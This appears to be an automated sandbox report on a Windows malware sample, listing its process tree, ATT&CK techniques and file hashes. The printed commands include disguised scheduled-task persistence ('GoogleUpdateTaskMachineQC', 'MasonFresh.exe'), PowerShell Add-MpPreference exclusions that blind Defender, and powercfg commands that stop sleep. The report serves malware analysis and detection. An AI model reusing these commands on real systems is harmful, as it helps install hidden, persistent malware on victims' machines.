- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1380
-
-
-
-
-
C:\Users\Admin\Downloads\Fresh.exe"C:\Users\Admin\Downloads\Fresh.exe"2⤵
- Executes dropped EXE
PID:5616 -
C:\Users\Admin\AppData\Local\Temp\4y3ovtul.fs3.exe"C:\Users\Admin\AppData\Local\Temp\4y3ovtul.fs3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2340
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "MasonFresh.exe" /tr "'C:\Users\Admin\Downloads\Fresh.exe'" /sc onlogon /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5124
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "MasonFresh.exe" /tr "'C:\Users\Admin\Downloads\Fresh.exe'" /sc onlogon /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5608 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5704
-
-
-
-
C:\Users\Admin\Downloads\Best.exe"C:\Users\Admin\Downloads\Best.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:5936
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:660 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4624
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:3836
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:980
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:2500 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2500 -s 2324⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5724
-
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:5024 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5024 -s 2364⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2320
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjxszzlc#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:5940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3660
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5692
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:3912 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:476
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:3324
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:376
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:5632
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:2084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjxszzlc#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5460 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5792
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4344
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:5412
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:1028 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:2592
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:5712
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:6096
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:5016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:4380
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:5592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:2404
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:1212 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:2440
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:1664
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:4456
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:2836
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4052
-
-
C:\Users\Admin\Downloads\Fresh.exe"C:\Users\Admin\Downloads\Fresh.exe"2⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\bezte5mm.czc.exe"C:\Users\Admin\AppData\Local\Temp\bezte5mm.czc.exe"3⤵PID:6044
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "MasonFresh.exe" /tr "'C:\Users\Admin\Downloads\Fresh.exe'" /sc onlogon /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4388
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "MasonFresh.exe" /tr "'C:\Users\Admin\Downloads\Fresh.exe'" /sc onlogon /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4500
-
-
-
C:\Users\Admin\Downloads\SecurityHealth.exe"C:\Users\Admin\Downloads\SecurityHealth.exe"2⤵PID:4380
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "SecurityHealth" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB731.tmp" /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:4284
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1488
-
-
C:\Users\Admin\Downloads\Update.exe"C:\Users\Admin\Downloads\Update.exe"2⤵PID:5484
-
-
C:\Users\Admin\Downloads\Winrar.exe"C:\Users\Admin\Downloads\Winrar.exe"2⤵PID:4820
-
-
C:\Users\Admin\Downloads\testo.exe"C:\Users\Admin\Downloads\testo.exe"2⤵PID:2148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:1960
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:3016 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:1816
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:3260
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:3100
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:5124
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:2008
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:3436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#piugs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:1948
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:3948
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:4624 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:2712
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:2104
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:4820
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:3576
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:2584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:5568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#piugs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:6120
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:5480
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#piugs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:3128
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:6040
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:4252 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:5740
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:5592
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:1156
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:5604
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:3328
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3440
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3812
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3860
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3992
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:5472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:5320
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:3692
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:5424
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2924
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5520
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
PID:4976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5088
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4468 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 2500 -ip 25002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1676
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 5024 -ip 50242⤵PID:2440
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
1Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
Filesize
42KB
MD544f673284a335253bf34385dbbc2b6c1
SHA1a743e09d5636d419c15de5b6c8f415754a7968d7
SHA256718620d2a7ac7f1c544f2a5e79b088ac4fa18987dd296021ef55e0b236f8359b
SHA51211decbc0c5d117d090e3fb53da62b5889ed838b90e3f1a2feb0618bf9d5af4336aa60a6506280bf9426cf2ee01031fbfd87a1bd73e4d1be551461cea802e45b6
-
Filesize
13KB
MD5d8467e2c68f25a5695c38bd451dc5c77
SHA1a5818cb42e3ff8bb5dd1444074c2bb1cae0b628a
SHA25671a80e6f13892f1cafbb70aea3a96812a119491f54c8673d161918885a5eb802
SHA512d8c6a769961ff606ae8dc9be0f75878d9bc231745c718a10391857e89203b5c2e0778f07ef2bc280378ea93c27f86d93643160819fceb37fae252499f7ef11c3
-
Filesize
649B
MD5f86eb4bdc07455a7232a0a513c79b120
SHA1f3948b3d4173e2ebd41b1984839c76bb4cd65f05
SHA256addc674b982946f35709aba8cdb4f7dc9d2ad32d697e97224f9592c966554a66
SHA51298da48dd1853aea6e1003b399a6031825ba29d71ed2f9671cf2447fdb971d75bbe2c01ff59bf1ad19583e5d0a4baddeac24cf25910e3a62172d16e1f94112110
-
Filesize
2KB
MD5f4e97c98daf550d13e460c02a7f6277a
SHA164de4862283cf972c6d0b55b1e7f45fb707be910
SHA256bad46b99897f885f6c7573666e5a7e485acc4a928b433ce7d0fe4fd7c0b37ddd
SHA512105b4f9415a1a4ceb985502ce21fba4b564946c14e6ee5f1defb18300f455c1ffa0c2c8dd07167f1acb1fc5de56b32df9dcd169d698807d1ead9ec4c8b59a72a
-
Filesize
3KB
MD5c2b9a8e73e4c9dee61007192639e22cc
SHA1310eb060de720bd7be772a606998a566ed96008a
SHA256a1cbe06dbbea28399fec30bf9cd6a7c89820532a5efe53c338751c0d9bfed44b
SHA512d4d28c6c6237cda24b726f5d34501d189b1387a86229408483178f2647bdfd9a034e65d7a699a420146b6d8562a2b20fff679eef1049b7c78f5f282c31f256ce
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
11KB
MD5deffa3e11f9ce1aa47ad959b29a19385
SHA11d44f136adfec7f7dd3fb66699aff2dcf8ace837
SHA2568659f6a8fe3bba4a09f90949ecc1fdc7ef5b622b9befe32f79e1ec89cc9b2296
SHA512a80f71ed13cdc270b3ffae7d677cff508afa82b558baefd915dc7ab876f4d86c1dd3dc98836b90cf379bb15956c8b27a7b978634b0ac163099ab483c8de2e753
-
Filesize
11KB
MD541163790eedbb6c5ef5ecd187ac8ad4a
SHA140304137142c6d83cf1c97dd92e14322ef10f701
SHA2561e56359154d79a77beac2f882b44a07243e1d9d24d35ca56a94435c9fbd774ad
SHA5121e3be5e310ad97d3e9613d9b337d9a79385db680ada51df8f9e5857d4757952181eaded5e6fbd2822cc085c0955bc486ace037afd56f02614f403a71afa042d6
-
Filesize
11KB
MD5a8faaf2812c903d4434ef4613f6471bd
SHA1406aa91974bf0748f58021f8cdc615741f20a17f
SHA256da26eff18bbb58e6f6fe2988bfb2610c750b227cbb0a07a7cd13984b6ef0f957
SHA512f8654d0b0e615670e12c5c99241ead04daab54d08e0f275b994664c6bedf5af36bbbc44392afbe917480435464b4bfb35456d581652582e6e49025364f96e529
-
Filesize
11KB
MD5af986a005aee35e3bec8f758159ece83
